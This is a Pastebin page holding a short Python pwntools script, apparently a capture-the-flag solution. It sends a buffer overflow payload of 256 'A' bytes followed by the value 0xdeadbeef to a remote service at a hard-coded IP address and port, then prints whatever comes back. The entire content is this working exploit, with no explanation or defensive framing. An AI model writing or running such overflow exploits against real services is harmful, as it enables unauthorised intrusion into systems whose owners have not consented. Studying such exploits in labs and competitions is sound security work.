Advertisement
Guest User

Untitled

a guest
Apr 23rd, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.13 KB | None | 0 0
  1. from pwn import *
  2.  
  3. payload='A'*256+'\xef\xbe\xad\xde'
  4.  
  5. p=remote('109.233.56.90', 11061)
  6. p.sendline(payload)
  7. print p.recvall()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement